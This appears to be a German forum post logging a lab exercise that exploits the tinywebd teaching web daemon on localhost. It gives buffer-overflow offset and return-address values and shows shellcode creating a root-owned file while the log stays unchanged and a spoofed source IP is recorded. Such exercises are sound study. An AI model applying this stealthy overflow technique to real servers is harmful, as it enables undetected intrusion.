Bitte die folgenden Werte in eurer .sh ändern:
OFFSET=524
RETADDR="\x24\xf5\xff\xbf" # at +100 bytes from buffer @ 0xbffff4c0
FAKEADDR="\xcf\xf4\xff\xbf" # +15 bytes from buffer @ 0xbffff4c0
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_slient.sh mark_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 316] [shellcode 53] [ret addr 128] [*fake_addr 8]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
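-------------- Terminal 2 (strace am laufenden tinywebd: im ersten Mitschnitt scheitern die Log-Schreibzugriffe auf fd 2560 mit EBADF, im zweiten gehen sie an fd 1; /var/log/tinywebd.log bleibt beim Lauf um 22:30 unverändert bei 6180 Bytes mit Zeitstempel 22:28, obwohl /Hacked angelegt wird – das Anwendungslog allein zeigt die Anfrage also nicht)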
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ps aux | grep tinywebd
root 2282 0.0 0.0 2180 368 ? Ss 22:13 0:00 ./tinywebd
root 2466 0.0 0.0 5924 840 pts/3 S+ 22:22 0:00 grep --color=auto tinywebd
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# strace -p 2282 -e trace=write
Process 2282 attached - interrupt to quit
write(2560, "09/14/2013 22:24:32> ", 21) = -1 EBADF (Bad file descriptor)
write(2560, "From 12.34.56.78:9090 \"GET / HTT"..., 54) = -1 EBADF (Bad file descriptor)
^CProcess 2282 detached
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# rm /Hacked
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ls -l /var/log/tinywebd.log
-rw------- 1 root root 6180 Sep 14 22:28 /var/log/tinywebd.log
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# chmod a+x ./xt_slient.sh
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_slient.sh mark_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 316] [shellcode 53] [ret addr 128] [*fake_addr 8]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ls -l /var/lo
local/ lock/ log/
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ls -l /var/log/tinywebd.log
-rw------- 1 root root 6180 Sep 14 22:28 /var/log/tinywebd.log
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ls -l /Hacked
-rw------- 1 root root 0 Sep 14 22:30 /Hacked
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ps aux | grep tinywebd
root 2282 0.0 0.0 2180 368 ? Ss 22:13 0:00 ./tinywebd
root 2604 0.0 0.0 5924 840 pts/3 S+ 22:31 0:00 grep --color=auto tinywebd
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# strace -p 2282 -e trace=write
Process 2282 attached - interrupt to quit
write(1, "09/14/2013 22:34:22> ", 21) = 21
write(1, "From 12.34.56.78:9090 \"GET / HTT"..., 54) = 54
^CProcess 2282 detached
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#